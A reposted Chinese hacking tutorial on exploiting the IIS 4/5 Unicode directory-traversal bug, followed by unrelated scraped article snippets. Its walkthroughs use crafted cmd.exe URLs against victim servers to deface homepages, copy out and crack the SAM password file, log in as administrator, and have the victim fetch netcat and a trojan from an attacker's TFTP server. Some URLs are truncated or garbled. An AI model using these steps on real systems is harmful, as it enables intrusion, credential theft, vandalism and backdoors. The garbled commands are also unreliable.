unicode终极利用 《转》

最近这些日子好多的WINNT的服务器被黑,尤其是国内的。下面是一些具体示例的总结。
下面这类型的漏洞以发现近一年多了,一年多前在国外的黑客网站就有了类似的文章,但
是当时 并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。
不过直到UNICOUDE漏洞的发现,黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总
结一下。
希望大家能从这里体会到点什么。(下面的文章来自一些邮件列表和BBS)

原理:(其实原来都很相似,我拿这个做个例子。)

NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,
导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode
字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执
行某些web根目录以外的文件。
对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"
或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统
认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00<= %hh < 0x40的话,
采用的 解码的格式与下面的格式类似:
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
因此,利用这种编码,我们可以构造很多字符,例如:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
(1) 如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能
列出当前目录的内容:
http://www.victim.com/scripts/..%c1.../cmd.exe?/c+dir
(2) 利用这个漏洞查看系统文件内容也是可能的:
http://www.victim.com/a.asp/..%c1%1..../winnt/win.ini
Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,此问题同样
存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c".
下面我们的例子以%c1%1c为主讲解。
注:+号可以用%20代替,依这种格式你还可以构造出许多命令
好多站点\inetpub\下的scripts目录删除了,
但\Program Files\Common Files\System\下
的msadc还在(有msadcs.dll漏洞的话就不用
%c1%1c了)。这时可以如下构造请求:
http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:\

实践一:(修改主页----最简单化的一种)

很多入侵都以修改主页的形式表现出来,这通常有两种情况:一是表达自己的
愤慨——比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后,国内很多黑客
在ICQ、BBS一呼百应,纷纷对敌国进行各种形式的攻击,当然以替换主页最为大快人心!
二是在给网管发e-mail漏洞报告之后没反应,有的黑客按耐不住,就用修改主页的方式给
予警告, 用以引起人们对于安全技术的重视。当然说起来这是违法的啦,所以大家要注意
哦,不要光图一时的痛快, 呵呵!
可以使用ECHO命令、管道符等建立文件,修改文件内容。但因为IIS加载程序检测到有
CMD.EXE或者COMMAND.COM串就要检测特殊字符“&|(,;%<>”,如果发现有这些字符就会返
回500错误,所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法
绕过去。
http://xxx.xxx.xxx.xxx/scripts/..%c...scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/ccc....+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp
就改了主页了!
这种方法对于有负载均衡的主机很不方便,又需要几次才能完成,所以不好。袁哥给出了
另一种更方便的办法。参考袁哥(yuange)的帖子《IIS不用拷贝CMD.EXE使用管道符等的方
法》,可以这样:
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+Hacked+by+
hacker+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+12/1/2k+>>+
f:\wwwroot\xxx\default.asp
这样,主页就被更改成了:
Hacked by hacker
12/1/2k
当然我是没有这样做啦,不过这些东西我都在自己配置的环境下实现了,

在我练习的过程中发现,用ECHO写这些的时候很慢,如果你多次回车,过一阵屏幕刷新后
主页上就会留下多个你要写的内容。

实践二(下载SAM文件)

http://xxx.xxx.xxx.xxx/scripts/..%c.../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,
执行: http://xxx.xxx.xxx.xxx/scripts/..Á;../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c...em32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam
File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录:
winnt\system32\logfiles 看了看,呵呵!

实践三(用木马)

如果你对net use的使用不熟悉的话,可以找找相关的资料来看,net命令也是基本技
能啊,好好掌握吧) 在本地设定一个共享目录,比如f:\123,把ncx99.exe和冰河服务
端放在里面,同时为了试验, 放了一个0字节的1.txt;然后再tftp98中把目录指向
f:\123,现在就要让对方运行tftp.exe来下载文件啦!
http://xxx.xxx.xxx.xxx/scripts/cmd....wwwroot\scripts
然后
http://xxx.xxx.xxx.xxx/scripts/tftp...1.txt+cosys.txt
(111.111.111.111表示我们的ip,或者是我们的tftp服务器ip)
看,返回下面的内容:
CGI 錯誤
所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是:

Transfer successful: 0 bytes in 2 seconds, 0 bytes/s
这就成功啦!看看:
http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c+

时间: 2024-12-09 22:55:41

unicode终极利用 《转》的相关文章

《XSS跨站脚本攻击剖析与防御》目录—导读

内容提要 XSS跨站脚本攻击剖析与防御 本书是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下. 第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害.第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马.窃取Cookies.会话劫持到钓鱼欺骗,各种攻击都不容忽视.第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具.第4章 发掘XSS漏洞,着重以黑盒和白盒的角度介绍如何发掘XSS漏洞,以便帮助读者树立安全

通过javascript进行UTF-8编码的实现方法_javascript技巧

javascript的字符集: javascript程序是使用Unicode字符集编写的.Unicode是ASCII和Latin-1的超集,并支持地球上几乎所有的语言.ECMAScript3要求JavaScript必须支持Unicode2.1及后续版本,ECMAScript5则要求支持Unicode3及后续版本.所以,我们编写出来的 javascript程序,都是使用Unicode编码的. UTF-8 UTF-8(UTF8-bit Unicode Transformation Format)是一

Js中实现拼音和UrlEncode的功能(利用GB和Unicode对照表)

encode|js|拼音 经常用vb写的urlencoding很容易实现UrlEncode,以及利用http://www.csdn.net/Develop/read_article.asp?id=13846中的代码很容易改写成vbs从而实现部分汉字的拼音 但由于有些人需要完全用javascript写,而javascript默认是Unicode所以就需要一个Unicode和GB的转换库 Unicode和GB的转换库和UrlEncode和getSpell函数,请下载http://www.blueid

IIS5 UNICODE 编码漏洞的利用心得

iis|编码|心得 大家一定都知道那个风光了很久的IIS5 UNICODE 编码漏洞吧.没办法,第一篇教程不知道写什么好,随便先凑合着,就写一下这个漏洞的攻击心得吧. 1 首先我们来看看这个漏洞的原理. 在中文版的IIS4,和ISS5中,存在一个BUG,原因是UNICODE编码 存在BUG 在UNICODE 编码中,发现了一个奇怪的编码方式, 例如: %c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40) IIS 把 "%c1%hh" 编码成(0xc1 -0xc0) *

字符编码终极笔记:ASCII、Unicode、UTF-8、UTF-16、UCS、BOM、Endian

1.字符编码.内码,顺带介绍汉字编码  字符必须编码后才能被计算机处理.计算机使用的缺省编码方式就是计算机的内码.早期的计算机使用7位的ASCII编码,为了处理汉字,程序员设计了用于简体中文的GB2312和用于繁体中文的big5.  GB2312(1980年)一共收录了7445个字符,包括6763个汉字和682个其它符号.汉字区的内码范围高字节从B0-F7,低字节从A1-FE,占用的码位是72*94=6768.其中有5个空位是D7FA-D7FE.  GB2312支持的汉字太少.1995年的汉字扩

IIS5 UNICODE 编码漏洞的利用心得补充

iis|编码|心得 看了你的文章[unicode]写的很好, 我来说说用tftp怎么搞: 下载http://www.cners.com/tools/unicode.zip(下载快着呢) 解压: tftpd32.exe ncx99.exe 本机运行tftpd32.exe 再(接着你的来): http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c:\\inetpub\\scripts\\hihi.exe 注意了:这是将你

利用Photoshop给偏色的室内人像终极美化

原图   最终效果   1.人物背景不够简洁,使用钢笔工具(P)抠图将人物扣取出来,头发部分先保留随后利用通道来抠.     2.观察红绿蓝三通道,找出头发与背景反差最大的一个,将其复制出一个新通道,执行反相(CTRL+I)随后利用曲线.色阶等一切你熟悉用的工具(包括画笔)来进一步将头发和背景进行分离,效果如图所示.     3.载入选区(按住ctrl键的同时单击红副本图层).   4.返回图层面板,并点选到刚刚我们抠出的图层,执行CTRL+J复制选中的图层.     5.复制出来的图是这个样子

ming:如何利用博客做网站推广终极秘籍

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 利用博客做网站推广一直是大家比较喜欢的推广方式,用博客带外链,以博养站都是不错的选择,此前我的文章分享500个博客地址给用博客推广的朋友也分享了不少可以做外链和网站推广的blog.今天主要要谈的是如何用博客给我们的网站带来实际的流量. 1: 现在有流量的blog新浪,搜狐,网易,qq空间,百度空间,和讯都是不错的选择二级域名很多人都说要和自己

符号执行:利用Angr进行简单CTF逆向分析

一.符号执行概括 简单的来说,符号执行就是在运行程序时,用符号来替代真实值.符号执行相较于真实值执行的优点在于,当使用真实值执行程序时,我们能够遍历的程序路径只有一条,而使用符号进行执行时,由于符号是可变的,我们就可以利用这一特性,尽可能的将程序的每一条路径遍历,这样的话,必定存在至少一条能够输出正确结果的分支,每一条分支的结果都可以表示为一个离散关系式,使用约束求解引擎即可分析出正确结果,这就是符号执行的简单阐述. Angr是一个利用python开发的二进制程序分析框架,我们可以利用这个工具尝